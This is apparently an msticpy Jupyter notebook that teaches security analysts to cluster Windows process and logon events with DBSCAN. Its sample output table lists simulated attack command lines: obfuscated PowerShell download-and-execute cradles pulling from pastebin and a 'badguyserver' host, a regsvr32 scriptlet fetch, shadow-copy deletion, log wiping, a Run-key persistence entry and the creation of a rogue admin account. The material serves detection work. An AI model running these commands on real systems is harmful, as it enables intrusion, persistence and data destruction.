Large sets of events often contain many repetitive and uninteresting system processes. However, these frequently have values (e.g. command line or path content) that vary on each execution, which makes it difficult to find outlying events using standard sorting and grouping techniques. We process the data to extract patterns and use clustering to group these repetitive events into a single row (with an execution count). This makes it easier to find unusual events.
You must have msticpy installed with the "ml" components to run this notebook:
%pip install --upgrade msticpy[ml]
%pip install seaborn
# Imports
import sys
import warnings
from msticpy.common.utility import check_py_version
MIN_REQ_PYTHON = (3,6)
check_py_version(MIN_REQ_PYTHON)
from IPython import get_ipython
from IPython.display import display
import ipywidgets as widgets
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
import networkx as nx
import pandas as pd
pd.set_option('display.max_rows', 100)
pd.set_option('display.max_columns', 50)
pd.set_option('display.max_colwidth', 100)
import msticpy
msticpy.init_notebook(globals())
from msticpy.vis.timeline import display_timeline
from msticpy.vis import nbdisplay
# Some of our dependencies (networkx) still use deprecated Matplotlib
# APIs - we can't do anything about it so suppress them from view
from matplotlib import MatplotlibDeprecationWarning
warnings.simplefilter("ignore", category=MatplotlibDeprecationWarning)
Sometimes you don't have a source process to work with. Other times it's just useful to see what else is going on on the host. This section retrieves all processes on the host within the time bounds set in the query times widget.
You can display the raw output of this by looking at the processes_on_host dataframe. Just copy this into a new cell and hit Ctrl-Enter.
Usually, though, the results contain a lot of very repetitive and uninteresting system processes, so we attempt to cluster these to make the view easier to navigate. To do this, we process the raw event list output to extract a few features that render strings (such as the command line) into numerical values. The default below uses the following features: commandlineTokensFull, pathScore and isSystemSession (the cluster_columns passed to dbcluster_events).
Then we run a clustering algorithm (DBSCAN in this case) on the process list. The result groups similar (noisy) processes together and leaves unique process patterns as single-member clusters.
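To make the idea of rendering strings into numbers concrete, here is a minimal standard-library sketch. It is not msticpy's implementation: the function names and the delimiter set are assumptions chosen for illustration. One function counts delimiter characters in a command line and the other sums the character codes of a path.

```python
# Hypothetical delimiter set, chosen only for illustration.
DELIMITERS = set(" \t-\\/.,\"'|&:;%$()")


def count_delimiters(text: str) -> int:
    """Count delimiter characters as a rough proxy for command line structure."""
    return sum(1 for ch in text if ch in DELIMITERS)


def char_sum(text: str) -> int:
    """Sum the code points of every character in the string."""
    return sum(ord(ch) for ch in text)


print(count_delimiters("whoami"))                           # 0
print(count_delimiters(r"C:\Windows\system32\sppsvc.exe"))  # 5
print(char_sum(r"C:\Windows\System32\cmd.exe"))             # 2570
```

Two paths that differ by even one character will usually get different sums, which is why a score like this can act as a stand-in for "same path" when clustering on numeric columns.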
from msticpy.analysis.eventcluster import dbcluster_events, add_process_features
processes_on_host = pd.read_csv(
"data/processes_on_host.csv",
parse_dates=["TimeGenerated"],
infer_datetime_format=True,
)
feature_procs = add_process_features(input_frame=processes_on_host)
# you might need to play around with the max_cluster_distance parameter.
# decreasing this gives more clusters.
(clus_events, dbcluster, x_data) = dbcluster_events(
data=feature_procs,
cluster_columns=["commandlineTokensFull", "pathScore", "isSystemSession"],
time_column="TimeGenerated",
max_cluster_distance=0.0001,
)
print("Number of input events:", len(feature_procs))
print("Number of clustered events:", len(clus_events))
clus_events[["ClusterSize", "processName"]][clus_events["ClusterSize"] > 1].plot.bar(
x="processName", title="Process names with Cluster > 1", figsize=(12, 3)
)
Number of input events: 363
Number of clustered events: 62
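The effect of the distance threshold can be sketched without any libraries. The code below is a simplified stand-in for density-based clustering, not the code that dbcluster_events runs: points that can be chained together through neighbours within max_distance share a label, and isolated points are labelled -1. The function names and the sample points are hypothetical.

```python
from math import dist


def group_by_distance(points, max_distance):
    """Label points; points chained within max_distance share a label, loners get -1."""
    labels = [None] * len(points)
    next_label = 0
    for start in range(len(points)):
        if labels[start] is not None:
            continue
        labels[start] = next_label
        stack, members = [start], []
        while stack:  # flood-fill over neighbours within max_distance
            i = stack.pop()
            members.append(i)
            for j in range(len(points)):
                if labels[j] is None and dist(points[i], points[j]) <= max_distance:
                    labels[j] = next_label
                    stack.append(j)
        if len(members) == 1:
            labels[start] = -1  # treat an isolated point as noise
        else:
            next_label += 1
    return labels


def summary_rows(labels):
    """Rows left after collapsing each cluster to one row and keeping noise points."""
    return len({lab for lab in labels if lab != -1}) + labels.count(-1)


# Hypothetical (token count, path score) pairs.
points = [(10, 2941), (10, 2941), (10.5, 2941), (40, 3726), (7, 3131)]
for eps in (1.0, 0.1):
    labels = group_by_distance(points, eps)
    print(eps, labels, summary_rows(labels))
```

With the larger threshold the three nearby points collapse into one row (3 rows in total). With the smaller threshold only the two identical points merge (4 rows), which matches the comment that decreasing the distance gives more clusters.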
# Looking at the variability of commandlines and process image paths
import seaborn as sns
sns.set(style="darkgrid")
proc_plot = sns.catplot(
y="processName",
x="commandlineTokensFull",
data=feature_procs.sort_values("processName"),
kind="box",
height=10,
)
proc_plot.fig.suptitle("Variability of Commandline Tokens", x=1, y=1)
proc_plot = sns.catplot(
y="processName",
x="pathLogScore",
data=feature_procs.sort_values("processName"),
kind="box",
height=10,
hue="isSystemSession",
)
proc_plot.fig.suptitle("Variability of Path", x=1, y=1)
The top graph shows that a few processes have wide variability in their command line content, while the majority have little or none. Looking at a few examples, such as cmd.exe, powershell.exe, reg.exe and net.exe, we can recognize several common command line tools.
The second graph shows processes by full process path content. We wouldn't normally expect to see variation here, as is the case with most processes. There is also quite a lot of variance in the score between processes, which makes it a useful proxy feature for a unique path name (this means that proc1.exe and proc2.exe that have the same commandline score won't get collapsed into the same cluster).
Any process with a spread of values here means that the same process name (but not necessarily the same file) is being run from different locations.
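As a rough illustration of that last point, the following standard-library sketch lists process names that appear under more than one directory. The helper name is hypothetical and the sample paths are a small hand-picked list, not the notebook's dataframe.

```python
import ntpath  # Windows path rules, usable on any platform
from collections import defaultdict


def dirs_by_process_name(paths):
    """Map each lower-cased executable name to the set of directories it ran from."""
    seen = defaultdict(set)
    for path in paths:
        name = ntpath.basename(path).lower()
        seen[name].add(ntpath.dirname(path).lower())
    return seen


sample_paths = [
    r"C:\Windows\System32\cmd.exe",
    r"C:\Diagnostics\UserTmp\cmd.exe",
    r"C:\Windows\System32\svchost.exe",
    r"C:\Diagnostics\UserTmp\svchost.exe",
    r"C:\Windows\System32\whoami.exe",
]

# Keep only names seen in more than one location.
multi_location = {
    name: sorted(dirs)
    for name, dirs in dirs_by_process_name(sample_paths).items()
    if len(dirs) > 1
}
for name, dirs in multi_location.items():
    print(name, dirs)
```

A system binary name such as svchost.exe showing up outside its usual directory is the kind of spread the path plot makes visible.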
display(
clus_events.sort_values("ClusterSize")[
[
"TimeGenerated",
"LastEventTime",
"NewProcessName",
"CommandLine",
"ClusterSize",
"commandlineTokensFull",
"pathScore",
"isSystemSession",
]
]
)
Index | TimeGenerated | LastEventTime | NewProcessName | CommandLine | ClusterSize | commandlineTokensFull | pathScore | isSystemSession |
---|---|---|---|---|---|---|---|---|
46 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\reg.exe | .\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | 1 | 16 | 2951 | False |
356 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe | "C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Resources\222\pmfexe.exe... | 1 | 27 | 9108 | True |
301 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\cmd.exe | "cmd" | 1 | 2 | 2570 | True |
256 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe | "CollectGuestLogs.exe" -Mode:ga -FileName:C:\WindowsAzure\CollectGuestLogsTemp\710dc858-9c96-4df... | 1 | 18 | 6421 | True |
219 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\wermgr.exe | C:\Windows\system32\wermgr.exe -upload | 1 | 7 | 2922 | True |
198 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c echo " SYSTEMINFO && SYSTEMINFO && DEL " | 1 | 17 | 2941 | False |
195 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c "cd /d "C:\inetpub\wwwroot"&c:\windows\system32\inetsrv\appcmd set config "Default Web S... | 1 | 39 | 2941 | False |
176 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\wuauclt.exe | .\wuauclt.exe /C "c:\windows\softwaredistribution\cscript.exe" | 1 | 14 | 3406 | False |
171 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\svchost.exe | c:\Windows\System32\svchost.exe -k malicious | 1 | 9 | 3040 | False |
163 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\netsh.exe | .\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\users\Bob\appdata\Ro... | 1 | 18 | 3179 | False |
162 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c C:\Windows\System32\mshta.exe vbscript:CreateObject("Wscript.Shell").Run(".\powershell.e... | 1 | 56 | 2941 | False |
139 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell -command "(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'... | 1 | 36 | 3726 | False |
134 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\wbem\WmiPrvSE.exe | C:\Windows\system32\wbem\wmiprvse.exe -Embedding | 1 | 8 | 3546 | True |
133 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\sppsvc.exe | C:\Windows\system32\sppsvc.exe | 1 | 5 | 2933 | True |
130 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... | 1 | 25 | 3726 | False |
110 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... | 1 | 46 | 2941 | False |
292 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\taskhostw.exe | taskhostw.exe SYSTEM | 1 | 2 | 3262 | True |
106 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell.exe -c "$a = 'Download'+'String'+"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"... | 1 | 68 | 3726 | False |
57 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\tsetup.1.exe | c:\Diagnostics\UserTmp\tsetup.1.exe C:\Users\MSTICAdmin\AppData\Local\Temp\2\is-01DD7.tmp\tsetu... | 1 | 40 | 3405 | False |
59 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\netsh.exe | .\netsh.exe "in (*.exe) do start # artificial commandline solely for purposes of triggering test" | 1 | 22 | 3179 | False |
61 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&powershell Enable-WSManCredSSP =2013Role Server -force&ech... | 1 | 28 | 2941 | False |
64 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&c:\windows\system32\inetsrv\appcmd set config "Default Web... | 1 | 41 | 2941 | False |
65 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&del C:\inetpub\logs\logFiles\W3SVC1\*.log /q&echo [S]&cd&e... | 1 | 32 | 2941 | False |
74 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\dllhost.exe | C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | 1 | 12 | 3024 | True |
62 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&powershell winrm set winrm/config/service/Auth @{Kerberos=... | 1 | 31 | 2941 | False |
78 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\cmd.exe | cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... | 1 | 21 | 2570 | False |
82 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\net1.exe | C:\Windows\system32\net1 share TestShare=c:\testshare /Grant:Users,Read | 1 | 13 | 2638 | False |
83 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\Dism.exe | dism /online /enable-feature /featurename:File-Services /NoRestart | 1 | 11 | 2659 | True |
86 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\Temp\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\DismHost.exe | C:\Windows\TEMP\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\dismhost.exe {D57BA872-53C0-424D-80AE-E4911... | 1 | 15 | 4900 | True |
87 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\servicing\TrustedInstaller.exe | C:\Windows\servicing\TrustedInstaller.exe | 1 | 5 | 4175 | True |
94 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\regsvr32.exe | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll | 1 | 20 | 3399 | False |
75 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Windows\System32\cmd.exe | cmd.exe /c c:\Diagnostics\WindowsSimulateDetections.bat c:\Diagnostics\UserTmp | 1 | 12 | 2570 | True |
108 | 2019-01-15 04:23:43.103 | 2019-01-15 05:15:20.623 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+("{2}{0}{1}"-f ':/','/past... | 1 | 53 | 3726 | False |
63 | 2019-01-15 05:15:16.850 | 2019-01-15 05:15:17.580 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\ProgramData"&copy \\[REDACTED]\c$\users\[REDACTED]\Documents\"Password Chan... | 2 | 29 | 2941 | False |
211 | 2019-01-15 05:15:19.223 | 2019-01-15 05:15:19.337 | C:\Diagnostics\UserTmp\hd.exe | hd.exe -pslist | 2 | 4 | 2837 | False |
190 | 2019-01-15 05:15:18.287 | 2019-01-15 05:15:18.967 | C:\Diagnostics\UserTmp\lsass.exe | .\lsass.exe /C "c:\windows\softwaredistribution\cscript.exe" | 2 | 14 | 3183 | False |
149 | 2019-01-15 05:15:15.520 | 2019-01-15 05:15:15.923 | C:\Windows\System32\net.exe | net group "Domain Admins" /domain | 2 | 8 | 2589 | False |
104 | 2019-01-15 05:15:12.977 | 2019-01-15 05:15:19.583 | C:\Diagnostics\UserTmp\powershell.exe | .\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... | 2 | 24 | 3726 | False |
95 | 2019-01-15 05:15:10.817 | 2019-01-15 05:15:14.453 | C:\Windows\System32\svchost.exe | C:\Windows\system32\svchost.exe -k wsappx | 2 | 8 | 3040 | True |
77 | 2019-01-15 05:15:03.247 | 2019-01-15 05:15:11.260 | C:\Windows\System32\cmd.exe | cmd /c echo Any questions about the commands executed here then please contact one of | 2 | 16 | 2570 | False |
270 | 2019-01-15 04:28:01.517 | 2019-01-15 04:28:33.090 | C:\Program Files (x86)\Google\Update\GoogleUpdate.exe | "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler | 2 | 17 | 4895 | True |
254 | 2019-01-15 04:42:25.437 | 2019-01-15 05:12:25.403 | C:\Windows\System32\MusNotification.exe | C:\Windows\system32\MusNotification.exe Display | 2 | 6 | 3826 | True |
60 | 2019-01-15 05:15:15.827 | 2019-01-15 05:15:16.720 | C:\Diagnostics\UserTmp\cmd.exe | .\cmd /c "cd /d "C:\inetpub\wwwroot"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&ec... | 3 | 25 | 2941 | False |
142 | 2019-01-15 05:15:14.770 | 2019-01-15 05:15:15.283 | C:\Windows\System32\whoami.exe | whoami | 3 | 0 | 2907 | False |
125 | 2019-01-15 05:15:12.123 | 2019-01-15 05:15:17.650 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" | 3 | 21 | 2941 | False |
56 | 2019-01-15 05:15:16.117 | 2019-01-15 05:15:18.403 | C:\Diagnostics\UserTmp\reg.exe | .\reg.exe add \hkcu\software\microsoft\some\key\Run /v abadvalue | 3 | 15 | 2951 | False |
85 | 2019-01-15 05:15:03.830 | 2019-01-15 05:15:19.447 | C:\Windows\System32\net.exe | net use q: \\MSTICAlertsWin1\TestShare Bob_testing /User:adm1nistrator | 3 | 12 | 2589 | False |
49 | 2019-01-15 05:15:16.353 | 2019-01-15 05:15:16.520 | C:\Diagnostics\UserTmp\42424.exe | 42424.exe | 3 | 1 | 2889 | False |
69 | 2019-01-15 05:15:03.390 | 2019-01-15 05:15:17.137 | C:\Windows\System32\vssadmin.exe | vssadmin delete shadows /all /quiet | 4 | 7 | 3131 | False |
193 | 2019-01-15 05:02:28.260 | 2019-01-15 05:15:19.537 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c "powershell wscript.shell used to download a .gif" | 5 | 14 | 2941 | False |
169 | 2019-01-15 05:15:14.493 | 2019-01-15 05:15:19.060 | C:\Diagnostics\UserTmp\svchost.exe | c:\Diagnostics\UserTmp\svchost.exe | 6 | 6 | 3411 | False |
122 | 2019-01-15 05:15:11.947 | 2019-01-15 05:15:19.403 | C:\Diagnostics\UserTmp\implant.exe | implant.exe k111 | 7 | 3 | 3390 | False |
68 | 2019-01-15 05:15:12.513 | 2019-01-15 05:15:18.630 | C:\Diagnostics\UserTmp\doubleextension.pdf.exe | c:\Diagnostics\UserTmp\doubleextension.pdf.exe | 7 | 7 | 4617 | False |
80 | 2019-01-15 05:15:03.410 | 2019-01-15 05:15:18.670 | C:\Windows\System32\net1.exe | C:\Windows\system32\net1 user adm1nistrator Bob_testing /add | 7 | 10 | 2638 | False |
67 | 2019-01-15 05:15:05.193 | 2019-01-15 05:15:19.617 | C:\Diagnostics\UserTmp\sdopfjiowtbkjfnbeioruj.exe | c:\Diagnostics\UserTmp\sdopfjiowtbkjfnbeioruj.exe | 9 | 6 | 5005 | False |
48 | 2019-01-15 05:15:10.667 | 2019-01-15 05:15:18.917 | C:\Diagnostics\UserTmp\rundll32.exe | .\rundll32 /C 42424.exe | 15 | 7 | 3391 | False |
47 | 2019-01-15 05:15:03.057 | 2019-01-15 05:15:18.820 | C:\Diagnostics\UserTmp\cmd.exe | cmd /c "systeminfo && systeminfo" | 23 | 10 | 2941 | False |
96 | 2019-01-15 05:15:11.190 | 2019-01-15 05:15:18.867 | C:\Windows\System32\win32calc.exe | "C:\Windows\System32\win32calc.exe" | 28 | 8 | 3100 | False |
0 | 2019-01-15 04:16:24.007 | 2019-01-15 05:24:24.010 | C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\De... | "C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\D... | 35 | 52 | 12225 | True |
2 | 2019-01-15 04:16:25.550 | 2019-01-15 05:24:25.807 | C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding | 38 | 10 | 3478 | True |
1 | 2019-01-15 04:16:24.027 | 2019-01-15 05:24:24.023 | C:\Windows\System32\conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | 39 | 10 | 3028 | True |
3 | 2019-01-15 04:15:26.000 | 2019-01-15 05:24:26.010 | C:\Windows\System32\cscript.exe | "C:\Windows\system32\cscript.exe" /nologo "MonitorKnowledgeDiscovery.vbs" | 71 | 13 | 3022 | True |
# Look at clusters for individual process names
def view_cluster(exe_name):
    display(
        clus_events[["ClusterSize", "processName", "CommandLine", "ClusterId"]][
            clus_events["processName"] == exe_name
        ]
    )
view_cluster("reg.exe")
Index | ClusterSize | processName | CommandLine | ClusterId |
---|---|---|---|---|
46 | 1 | reg.exe | .\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | -1 |
56 | 3 | reg.exe | .\reg.exe add \hkcu\software\microsoft\some\key\Run /v abadvalue | 7 |
# Show all clustered processes
from msticpy.analysis.eventcluster import plot_cluster
# Create label with unqualified path
labelled_df = processes_on_host.copy()
labelled_df["label"] = labelled_df.apply(
lambda x: x.NewProcessName.split("\\")[-1], axis=1
)
%matplotlib inline
#%matplotlib notebook
plt.rcParams["figure.figsize"] = (15, 10)
plot_cluster(
dbcluster,
labelled_df,
x_data,
plot_label="label",
plot_features=[0, 1],
verbose=False,
cut_off=3,
xlabel="CmdLine Tokens",
ylabel="Path Score",
)
# Show timeline of events - clustered events
clus_events.mp_plot.timeline(
# overlay_data=processes_on_host,
title="Distinct Host Processes (bottom) and All Processes (top)"
)
Since the number of logon events may be large and, in the case of system logons, very repetitive, we use clustering to try to identify logons with unique characteristics.
In this case we use the numeric score of the account name and the logon type (i.e. interactive, service, etc.). The results of the clustered logons are shown below along with a more detailed, readable printout of the logon event information. The data here will vary depending on whether this is a Windows or Linux host.
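The idea can be sketched with the standard library alone. This is a simplified illustration, not the clustering code itself: each logon is reduced to an (account score, logon type) pair and identical pairs are counted. The account_score helper is a plain character-code sum written for this example (msticpy's char_ord_score may differ in detail), and the event list is a hand-built stand-in that mirrors the per-account counts in the sample data.

```python
from collections import Counter

# Logon type names as they appear in the logon detail output.
LOGON_TYPES = {3: "Network", 4: "Batch", 5: "Service"}


def account_score(account: str) -> int:
    """Sum the character codes of the account name (illustrative helper)."""
    return sum(ord(ch) for ch in account)


# Hand-built stand-in for the logon events: (Account, LogonType) pairs.
logons = (
    [("NT AUTHORITY\\SYSTEM", 5)] * 11
    + [("MSTICAlertsWin1\\MSTICAdmin", 4)] * 2
    + [("MSTICAlertsWin1\\adm1nistrator", 3)]
)

# Identical (score, type) pairs collapse into one pattern with a count.
patterns = Counter((account_score(acct), ltype) for acct, ltype in logons)
for (score, ltype), count in patterns.most_common():
    print(score, LOGON_TYPES[ltype], count)
```

The 14 events reduce to three patterns, and the single network logon stands out as the only pattern seen once.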
from msticpy.analysis.eventcluster import (
dbcluster_events,
add_process_features,
char_ord_score,
)
host_logons = pd.read_csv(
"data/host_logons.csv", parse_dates=["TimeGenerated"], infer_datetime_format=True
)
logon_features = host_logons.copy()
logon_features["AccountNum"] = host_logons.apply(
lambda x: char_ord_score(x.Account), axis=1
)
logon_features["LogonHour"] = host_logons.apply(lambda x: x.TimeGenerated.hour, axis=1)
# you might need to play around with the max_cluster_distance parameter.
# decreasing this gives more clusters.
(clus_logons, _, _) = dbcluster_events(
data=logon_features,
time_column="TimeGenerated",
cluster_columns=["AccountNum", "LogonType"],
max_cluster_distance=0.0001,
)
print("Number of input events:", len(host_logons))
print("Number of clustered events:", len(clus_logons))
print("\nDistinct host logon patterns:")
display(clus_logons.sort_values("TimeGenerated"))
Number of input events: 14
Number of clustered events: 3

Distinct host logon patterns:
Index | Unnamed: 0 | TenantId | Account | EventID | TimeGenerated | SourceComputerId | Computer | SubjectUserName | SubjectDomainName | SubjectUserSid | TargetUserName | TargetDomainName | TargetUserSid | TargetLogonId | LogonProcessName | LogonType | AuthenticationPackageName | Status | IpAddress | WorkstationName | AccountNum | LogonHour | Clustered | ClusterId | ClusterSize | FirstEventTime | LastEventTime |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 | 1 | 802d39e1-9d70-404d-832c-2de5e2478eda | NT AUTHORITY\SYSTEM | 4624 | 2019-01-15 01:42:28.340 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | MSTICAlertsWin1$ | WORKGROUP | S-1-5-18 | SYSTEM | NT AUTHORITY | S-1-5-18 | 0x3e7 | Advapi | 5 | Negotiate | NaN | - | - | 1484 | 5 | True | 1 | 11 | 2019-01-15 01:42:28.340 | 2019-01-15 05:15:14.453 |
0 | 0 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4624 | 2019-01-15 04:28:33.090 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | MSTICAlertsWin1$ | WORKGROUP | S-1-5-18 | MSTICAdmin | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | 0xfaac27 | Advapi | 4 | Negotiate | NaN | - | MSTICAlertsWin1 | 2319 | 5 | True | 0 | 2 | 2019-01-15 04:28:33.090 | 2019-01-15 05:15:02.980 |
2 | 2 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\adm1nistrator | 4624 | 2019-01-15 05:15:06.363 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | - | - | S-1-0-0 | adm1nistrator | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-1066 | 0xfb5ee6 | NtLmSsp | 3 | NTLM | NaN | fe80::38dc:e4a9:61bd:b458 | MSTICAlertsWin1 | 2799 | 5 | False | -1 | 1 | 2019-01-15 05:15:06.363 | 2019-01-15 05:15:06.363 |
# Display logon details
nbdisplay.display_logon_data(clus_logons)
Account: adm1nistrator Account Domain: MSTICAlertsWin1 Logon Time: 2019-01-15 05:15:06.363000 Logon type: 3(Network) User Id/SID: S-1-5-21-996632719-2361334927-4038480536-1066 SID S-1-5-21-996632719-2361334927-4038480536-1066 is local machine or domain account Subject (source) account: -/- Logon process: NtLmSsp Authentication: NTLM Source IpAddress: fe80::38dc:e4a9:61bd:b458 Source Host: MSTICAlertsWin1 Logon status: nan |
Account: MSTICAdmin Account Domain: MSTICAlertsWin1 Logon Time: 2019-01-15 04:28:33.090000 Logon type: 4(Batch) User Id/SID: S-1-5-21-996632719-2361334927-4038480536-500 SID S-1-5-21-996632719-2361334927-4038480536-500 is administrator SID S-1-5-21-996632719-2361334927-4038480536-500 is local machine or domain account Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: MSTICAlertsWin1 Logon status: nan |
Account: SYSTEM Account Domain: NT AUTHORITY Logon Time: 2019-01-15 01:42:28.340000 Logon type: 5(Service) User Id/SID: S-1-5-18 SID S-1-5-18 is LOCAL_SYSTEM Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: - Logon status: nan |
clus_logons
Index | Unnamed: 0 | TenantId | Account | EventID | TimeGenerated | SourceComputerId | Computer | SubjectUserName | SubjectDomainName | SubjectUserSid | TargetUserName | TargetDomainName | TargetUserSid | TargetLogonId | LogonProcessName | LogonType | AuthenticationPackageName | Status | IpAddress | WorkstationName | AccountNum | LogonHour | Clustered | ClusterId | ClusterSize | FirstEventTime | LastEventTime |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2 | 2 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\adm1nistrator | 4624 | 2019-01-15 05:15:06.363 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | - | - | S-1-0-0 | adm1nistrator | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-1066 | 0xfb5ee6 | NtLmSsp | 3 | NTLM | NaN | fe80::38dc:e4a9:61bd:b458 | MSTICAlertsWin1 | 2799 | 5 | False | -1 | 1 | 2019-01-15 05:15:06.363 | 2019-01-15 05:15:06.363 |
0 | 0 | 802d39e1-9d70-404d-832c-2de5e2478eda | MSTICAlertsWin1\MSTICAdmin | 4624 | 2019-01-15 04:28:33.090 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | MSTICAlertsWin1$ | WORKGROUP | S-1-5-18 | MSTICAdmin | MSTICAlertsWin1 | S-1-5-21-996632719-2361334927-4038480536-500 | 0xfaac27 | Advapi | 4 | Negotiate | NaN | - | MSTICAlertsWin1 | 2319 | 5 | True | 0 | 2 | 2019-01-15 04:28:33.090 | 2019-01-15 05:15:02.980 |
1 | 1 | 802d39e1-9d70-404d-832c-2de5e2478eda | NT AUTHORITY\SYSTEM | 4624 | 2019-01-15 01:42:28.340 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | MSTICAlertsWin1 | MSTICAlertsWin1$ | WORKGROUP | S-1-5-18 | SYSTEM | NT AUTHORITY | S-1-5-18 | 0x3e7 | Advapi | 5 | Negotiate | NaN | - | - | 1484 | 5 | True | 1 | 11 | 2019-01-15 01:42:28.340 | 2019-01-15 05:15:14.453 |
